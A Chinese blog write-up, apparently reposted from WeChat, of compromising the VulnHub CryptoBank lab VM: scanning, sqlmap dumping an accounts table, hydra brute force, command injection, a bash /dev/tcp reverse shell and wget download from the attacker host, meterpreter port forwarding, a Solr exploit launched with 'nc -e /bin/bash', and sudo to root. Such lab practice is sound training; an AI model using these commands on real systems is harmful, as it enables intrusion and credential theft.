vulnhub之CryptoBank的实践

admin 2023年1月29日20:31:30评论52 views字数 2090阅读6分58秒阅读模式

今天实践的是vulnhub的CryptoBank镜像,

下载地址,https://download.vulnhub.com/cryptobank/CryptoBank.ova,

先是用workstation导入,做地址扫描没扫到地址,

于是又用virtualbox导入,重新做地址扫描,

sudo netdiscover -r 192.168.0.0/24,这回有地址了,187就是,

vulnhub之CryptoBank的实践

再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.187,

vulnhub之CryptoBank的实践

有web服务,浏览器访问http://192.168.0.187,

vulnhub之CryptoBank的实践

获取到一些用户名信息,先存起来,vim users.txt,

william.d
julius.b
bill.w
john.d

点击登录发现需要用域名,本地添加一下,

192.168.0.187 cryptobank.local

vulnhub之CryptoBank的实践

猜测登录页面有sql注入漏洞,上sqlmap,

先用burp suite获取到访问信息,保存到req.txt,

vulnhub之CryptoBank的实践

暴破数据库,sqlmap -r req.txt --dbs --batch,

vulnhub之CryptoBank的实践

暴破数据表,sqlmap -r req.txt --dbs -D cryptobank --tables --batch,

vulnhub之CryptoBank的实践

暴破表项,sqlmap -r req.txt --dbs -D cryptobank -T accounts --dump --batch,

vulnhub之CryptoBank的实践

获取到一些密码信息,也存起来,vim pass.txt,

x8CRvHqgPp
8hPx2Zqn4b
zm2gBcaxd3
NqRF4W85yf
LnBHvEhmw3
6X7DnLF5pG
3mwZd896Me
3Nrc2FYJMe
wJWm4CgV26
gFG7pqE5cn
LxZjkK87nu
7HwAEChFP9

用域名对web服务做目录暴破,dirb http://cryptobank.local,

vulnhub之CryptoBank的实践

浏览器访问http://cryptobank.local/development,

vulnhub之CryptoBank的实践

用之前获取到的用户名和密码信息进行暴破,

hydra -L users.txt -P pass.txt cryptobank.local -f http-get /development,获取到匹配的用户名密码,julius.b/wJWm4CgV26,

vulnhub之CryptoBank的实践

继续做目录暴破,dirb http://cryptobank.local/development/ -u julius.b:wJWm4CgV26,

vulnhub之CryptoBank的实践

浏览器访问http://cryptobank.local/development/tools,

vulnhub之CryptoBank的实践

点击进入执行系统命令的页面,用id/wJWm4CgV26进行测试,

vulnhub之CryptoBank的实践

在kali攻击机上造个反弹shell脚本,

msfvenom -p cmd/unix/reverse_bash lhost=192.168.0.188 lport=4444 R,

echo "0<&150-;exec 150<>/dev/tcp/192.168.0.188/4444;sh <&150 >&150 2>&150" > shell.sh,

在kali攻击机上开个web下载服务,python2 -m SimpleHTTPServer,

vulnhub之CryptoBank的实践

用wget http://192.168.0.188:8000/shell.sh当用户名进行输入,

再用ls/wJWm4CgV26查一下,确认反弹shell脚本已上传,

vulnhub之CryptoBank的实践

在kali攻击机上用msf开个反弹shell监听,

msfconsole
use exploit/multi/handler
set payload cmd/unix/reverse_bash
set lhost 192.168.0.188
set lport 4444
exploit

最后用bash shell.sh当用户名进行输入,反弹shell这就过来了,

vulnhub之CryptoBank的实践

转成后台运行再升级成meterpreter的shell,

sessions -u 1,sessions -i 2,

vulnhub之CryptoBank的实践

查看到本地端口服务,netstat -antp,172.17.0.1:8983,

vulnhub之CryptoBank的实践

做个端口转发,portfwd add -l 8983 -p 8983 -r 172.17.0.1,

浏览器访问发现是solr服务,

vulnhub之CryptoBank的实践

查找solr服务可被漏洞利用的信息,

searchsploit solr,searchsploit -m 47572,

vulnhub之CryptoBank的实践

把漏洞利用脚本上传到靶机,

cd /tmp,upload /home/kali/47572.py,

转成交互式shell,python3 -c 'import pty; pty.spawn("/bin/bash")',

执行脚本送出反弹shell,

python3 47572.py 172.17.0.1 8983 "nc -e /bin/bash 192.168.0.188 7654",

vulnhub之CryptoBank的实践

重新开个nc反弹shell监听,获取到新的反弹shell,

转成交互式shell,python -c 'import pty; pty.spawn("/bin/sh")',

sudo -l查看root权限,确认可以直接切到root,

sudo su root,使用默认密码solr,id确认没问题,

vulnhub之CryptoBank的实践


原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之CryptoBank的实践

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年1月29日20:31:30
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   vulnhub之CryptoBank的实践https://cn-sec.com/archives/1528528.html

发表评论

匿名网友 填写信息